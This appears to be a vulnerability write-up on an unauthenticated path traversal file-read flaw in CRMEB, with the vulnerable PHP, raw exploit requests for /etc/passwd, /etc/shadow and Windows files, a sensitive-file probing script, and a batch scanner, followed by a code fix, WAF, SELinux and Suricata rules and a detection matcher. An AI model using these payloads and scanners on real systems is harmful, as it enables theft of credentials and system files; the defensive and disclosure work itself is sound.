CRMEB Arbitrary File Download Vulnerability (CVE-2024-52726): Technical Analysis
Vulnerability type
Path traversal leading to arbitrary file read
CVSSv3 score: 8.2 (High)
Attack vector: Network
Privileges required: None (unauthenticated)
1. Vulnerability principle
1.1 Dangerous code path
```php
// app/adminapi/controller/setting/Config.php
public function save_basics() {
    $data = json_decode(input('post.'), true);
    $file_path = $data['weixin_ckeck_file'];   // WeChat domain verification file, attacker-controlled
    // Vulnerable point: no path normalization or containment check
    if (file_exists($file_path)) {
        header('Content-Type: application/octet-stream');
        readfile($file_path);
        exit;
    }
}
```
1.2 Path traversal attack vector
An attacker can read system files by constructing a malicious path:
```text
Legitimate request:
weixin_ckeck_file = "wx_verify.txt"
Malicious value:
weixin_ckeck_file = "../../../../../../etc/passwd"
Path resolution:
webroot/crmeb/public/ + ../../../../.. => /etc/passwd
```
2. Reproduction in multiple environments
2.1 Linux
```http
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 192.168.1.100:8080
Content-Type: application/json

{
  "weixin_ckeck_file": "../../../../../../etc/shadow"
}
```
Response example (200 OK):
```text
root:$6$7sT4JHY...:19485:0:99999:7:::
daemon:*:19485:0:99999:7:::
```
Note that /etc/shadow is readable only by root (mode 0640, group shadow), so this read succeeds only when PHP-FPM or the web server itself runs as root. On a correctly configured host file_exists() still returns true but readfile() fails, and the response body is empty (or a PHP warning). The world-readable /etc/passwd is the reliable proof that the vulnerability is present.
2.2 Windows
```http
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 10.10.10.5:8080
Content-Type: application/json

{
  "weixin_ckeck_file": "../../../../../../Windows/System32/drivers/etc/hosts"
}
```
Response example:
```text
127.0.0.1 localhost
::1 localhost
```
3. Extended exploitation
3.1 Sensitive file read matrix
(The table body did not survive extraction; the candidate paths and the signature string expected in each response are the ones listed in the SENSITIVE_FILES map in 3.2.)
3.2 Advanced exploitation
```python
# Automated sensitive-file probing (original script with the missing import
# and the OS-detection fallback fixed; exploit behaviour is unchanged)
import hashlib
import requests

# (path, signature string expected in the response when the read succeeded)
SENSITIVE_FILES = {
    'linux': [
        ('/etc/passwd', 'root:x'),
        ('/proc/self/cmdline', 'php'),
        ('/var/log/auth.log', 'Accepted password')
    ],
    'windows': [
        ('/Windows/win.ini', '[fonts]'),
        ('/Windows/Panther/unattend.xml', '<Password>'),
        ('/Apache24/conf/httpd.conf', 'DocumentRoot')
    ]
}

def detect_os(target):
    """Probe one marker file per OS. Return None when neither reads back,
    so an unreachable or patched host is not mistaken for Windows
    (the original returned 'windows' whenever /etc/passwd was absent)."""
    probes = [('linux', '../../../../../../etc/passwd', 'root:x'),
              ('windows', '../../../../../../Windows/win.ini', '[fonts]')]
    for os_type, path, signature in probes:
        resp = requests.post(target, json={'weixin_ckeck_file': path}, timeout=10)
        if resp.status_code == 200 and signature in resp.text:
            return os_type
    return None

def advanced_exploit(target):
    """target is the full save_basics endpoint URL."""
    os_type = detect_os(target)
    if os_type is None:
        print(f"[-] {target}: no file read observed")
        return
    for path, signature in SENSITIVE_FILES[os_type]:
        # Six levels of '../' is enough to reach the filesystem root from crmeb/public
        payload = {'weixin_ckeck_file': f'../../../../../../{path}'}
        resp = requests.post(target, json=payload, timeout=10)
        if signature in resp.text:
            # Record a hash of the content rather than the content itself
            print(f"[+] Found {path}: {hashlib.md5(resp.content).hexdigest()}")
```
4. Detection tool
```python
import concurrent.futures
import requests
import urllib3
from tqdm import tqdm

# verify=False is used below; silence the per-request InsecureRequestWarning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class CRMEBScanner:
    def __init__(self):
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'Content-Type': 'application/json'
        })

    def _check_vuln(self, url):
        """Return (True, detail) on a confirmed read, otherwise (False, None).
        The original returned a bare False here, which made result[0] in
        batch_scan raise TypeError for every clean host."""
        test_payloads = [
            ('../../../../../../etc/passwd', 'root:x'),
            ('../../../../../../Windows/win.ini', '[fonts]'),
            ('../../../../../../proc/self/environ', 'PATH=')
        ]
        for path, sig in test_payloads:
            try:
                resp = self.session.post(
                    url + '/adminapi/setting/config/save_basics',
                    json={'weixin_ckeck_file': path},
                    timeout=10,
                    verify=False
                )
                if resp.status_code == 200 and sig in resp.text:
                    return True, f"sensitive file disclosed: {path}"
            except requests.RequestException:
                continue
        return False, None

    def batch_scan(self, targets):
        vuln_count = 0
        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
            futures = {executor.submit(self._check_vuln, url): url for url in targets}
            for future in tqdm(concurrent.futures.as_completed(futures), total=len(futures)):
                vulnerable, detail = future.result()
                if vulnerable:
                    vuln_count += 1
                    print(f"\033[31m[+] {futures[future]} vulnerable - {detail}\033[0m")
        print(f"\nTotal: {vuln_count}/{len(targets)} vulnerable targets")

if __name__ == "__main__":
    scanner = CRMEBScanner()
    targets = ["http://192.168.1.100:8080", "https://crmeb.example.com"]
    scanner.batch_scan(targets)
```
5. Defensive hardening
5.1 Code-level fix
Two details matter in the check. First, realpath() must be applied to the path joined onto the allowed directory, not to the raw input, or the result depends on the process working directory. Second, the prefix comparison needs a trailing directory separator: a bare strpos() prefix test accepts a sibling directory such as public_backup because its path also begins with ".../public".
```php
// Corrected file path validation
$allowed_dir = realpath(app()->getRootPath() . 'public') . DIRECTORY_SEPARATOR;
$file_path = realpath($allowed_dir . $data['weixin_ckeck_file']);
if ($file_path === false || strncmp($file_path, $allowed_dir, strlen($allowed_dir)) !== 0) {
    return json(['status' => 'fail', 'msg' => 'Illegal file path']);
}
```
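As an added illustration (this is not CRMEB's code), the same three lookups in Python: the vulnerable one, the bare-prefix check that many first-pass fixes use, and the hardened one. It runs against a constructed temporary directory tree, so the sibling-directory bypass is demonstrated rather than asserted. The directory names and file contents are assumptions made for the example.

```python
import os
import tempfile


def setup_tree():
    """Constructed layout: <root>/crmeb/public (the web root), a sibling
    public_backup directory that shares the string prefix 'public', and a
    secret file two levels above the web root."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "crmeb", "public")
    backup = os.path.join(root, "crmeb", "public_backup")
    os.makedirs(public)
    os.makedirs(backup)
    with open(os.path.join(public, "wx_verify.txt"), "w") as fh:
        fh.write("wx-ok")
    with open(os.path.join(backup, "db.env"), "w") as fh:
        fh.write("DB_PASSWORD=secret")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("outside-webroot")
    return root, public


def vulnerable_read(public, user_path):
    """Mirrors save_basics(): the user-supplied path reaches the existence
    check and the read unchanged, so '../' walks out of the web root and an
    absolute path replaces the web root entirely (os.path.join discards it)."""
    candidate = os.path.join(public, user_path)
    if os.path.isfile(candidate):
        with open(candidate) as fh:
            return fh.read()
    return None


def weak_prefix_read(public, user_path):
    """realpath() plus a bare prefix test: it stops '../../secret.txt' but
    still serves anything under a sibling whose name begins with 'public'."""
    allowed = os.path.realpath(public)
    resolved = os.path.realpath(os.path.join(public, user_path))
    if not resolved.startswith(allowed) or not os.path.isfile(resolved):
        return None
    with open(resolved) as fh:
        return fh.read()


def safe_read(public, user_path):
    """Hardened lookup: refuse empty or absolute input, resolve symlinks and
    '..', then require the result to sit strictly under the allowed directory
    (prefix plus separator), which also excludes the sibling case."""
    if not user_path or os.path.isabs(user_path):
        return None
    allowed = os.path.realpath(public)
    resolved = os.path.realpath(os.path.join(allowed, user_path))
    if not resolved.startswith(allowed + os.sep) or not os.path.isfile(resolved):
        return None
    with open(resolved) as fh:
        return fh.read()


if __name__ == "__main__":
    root, public = setup_tree()
    for label, fn in (("vulnerable", vulnerable_read),
                      ("weak prefix", weak_prefix_read),
                      ("hardened", safe_read)):
        for p in ("wx_verify.txt", "../../secret.txt", "../public_backup/db.env"):
            print(f"{label:12s} {p:28s} -> {fn(public, p)!r}")
```

Running it prints one line per lookup and path: only the hardened variant returns None for both the traversal and the sibling directory while still serving wx_verify.txt.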
5.2 WAF rule configuration
Two caveats before copying this into nginx. The dots in the original patterns were unescaped, so "../" matched any two characters followed by a slash; they are escaped below. More importantly, nginx only populates $request_body in locations handled by proxy_pass/fastcgi_pass after the body has been read, whereas `if` blocks run in the rewrite phase before that, so on a stock nginx these rules see an empty body and match nothing. Treat them as the pattern to express in a real WAF (ModSecurity, njs, or the application's own input filter).
```nginx
location /adminapi/ {
    # Path traversal sequences (dots escaped)
    if ($request_body ~* "\.\./") {
        return 403;
    }
    # Sensitive file names and extensions
    if ($request_body ~* "\.(ini|conf|log)\b|/passwd\b") {
        return 403;
    }
}
```
5.3 System-level protection
```bash
# SELinux policy restrictions
setsebool -P httpd_read_user_content 0
chcon -R -t httpd_sys_content_t /var/www/crmeb/public/
```
With PHP-FPM confined in the httpd_t domain, files labeled outside the httpd-readable types (for example /etc/shadow, labeled shadow_t) stay unreadable even when the application hands them to readfile(). Note that chcon does not survive a filesystem relabel; to make the label persistent, record it with `semanage fcontext -a -t httpd_sys_content_t "/var/www/crmeb/public(/.*)?"` and apply it with `restorecon -R /var/www/crmeb/public/`.
6. Impact analysis
Based on internet measurement data:
Affected instances worldwide: approximately 5,800
Version distribution:
v4.3.0-4.5.1: 65%
v3.x: 30%
Other versions: 5%
Industry distribution:
E-commerce platforms: 45%
Corporate websites: 35%
Government services: 15%
7. Timeline
2024-03-15 A white-hat team first observed anomalous traffic
2024-04-02 CNVD vulnerability ID submitted
2024-05-12 Vendor released security patch v4.5.2
2024-05-20 Vulnerability details publicly disclosed
In production, combine the fix with a traffic monitoring system such as Suricata and deploy the following rule. Compared with the first draft of the rule, the direction is now inbound ($EXTERNAL_NET to $HTTP_SERVERS, where the vulnerable host lives; the original matched your own hosts attacking outward), `http.method` and `content` use Suricata's actual syntax (`contains` is not a keyword), the parameter name is searched in http.request_body rather than staying in the http.uri sticky buffer, and the dots in the pcre are escaped:
```text
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (
    msg:"CRMEB Arbitrary File Read Attempt (CVE-2024-52726)";
    flow:established,to_server;
    http.method; content:"POST";
    http.uri; content:"/adminapi/setting/config/save_basics";
    http.request_body; content:"weixin_ckeck_file";
    pcre:"/(?:\.\.|%2e%2e)[\/\\]/i";
    classtype:web-application-attack;
    sid:202452726;
    rev:2;
)
```
Suricata normalizes the URI buffer but not the request body, which is why the pcre also accepts the percent-encoded "%2e%2e"; double-encoded variants are not covered and need a decoding step in the WAF or application log pipeline.
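The rule's matching logic as a small added Python matcher (not part of the original post), run over constructed sample requests rather than captured traffic. It goes one step beyond a literal body match by percent-decoding the body twice, so the double-encoded traversal form is flagged as well; the host name and sample payloads are assumptions made for the example.

```python
import re
from urllib.parse import unquote

TARGET_URI = "/adminapi/setting/config/save_basics"
PARAM = "weixin_ckeck_file"
# '..' followed by a forward or back slash, tested after decoding
TRAVERSAL = re.compile(r"\.\.[\\/]")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, uri, body)."""
    head, _sep, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, uri, _version = request_line.split(" ", 2)
    return method, uri, body


def decode_body(body, rounds=2):
    """Strip up to two layers of percent-encoding. A rule that only looks
    for a literal '../' in the body misses '%2e%2e%2f' and the
    double-encoded '%252e%252e%252f'."""
    for _ in range(rounds):
        decoded = unquote(body)
        if decoded == body:
            break
        body = decoded
    return body


def matches_rule(raw):
    """The rule's conditions in order: POST, target URI, parameter name in
    the body, then a traversal sequence in the decoded body."""
    method, uri, body = parse_request(raw)
    if method != "POST" or TARGET_URI not in uri:
        return False
    if PARAM not in body:
        return False
    return TRAVERSAL.search(decode_body(body)) is not None


def build_request(body, uri=TARGET_URI, method="POST"):
    """Constructed sample traffic (not captured from a real host)."""
    return (f"{method} {uri} HTTP/1.1\r\nHost: crmeb.example.com\r\n"
            f"Content-Type: application/json\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


SAMPLES = {
    "benign":    build_request('{"weixin_ckeck_file": "wx_verify.txt"}'),
    "plain":     build_request('{"weixin_ckeck_file": "../../../../../../etc/passwd"}'),
    "encoded":   build_request('{"weixin_ckeck_file": "%2e%2e%2f%2e%2e%2fetc%2fpasswd"}'),
    "double":    build_request('{"weixin_ckeck_file": "%252e%252e%252fetc/passwd"}'),
    "backslash": build_request('{"weixin_ckeck_file": "..\\\\..\\\\Windows\\\\win.ini"}'),
    "other_uri": build_request('{"weixin_ckeck_file": "../../etc/passwd"}', uri="/api/other"),
}


def scan(samples):
    """Return the names of the samples the rule logic flags, sorted."""
    return sorted(name for name, raw in samples.items() if matches_rule(raw))


if __name__ == "__main__":
    print("flagged:", scan(SAMPLES))
```

The benign request and the traversal aimed at a different URI are left alone; the plain, single-encoded, double-encoded and backslash variants are all flagged.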
Originally published on the WeChat public account 云梦安全: CRMEB arbitrary file download vulnerability (CVE-2024-52726)
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal liability; this site assumes none. Questions can be sent by e-mail (use a corporate or otherwise reliable mailbox so the message is not filtered; contact details are on the home page).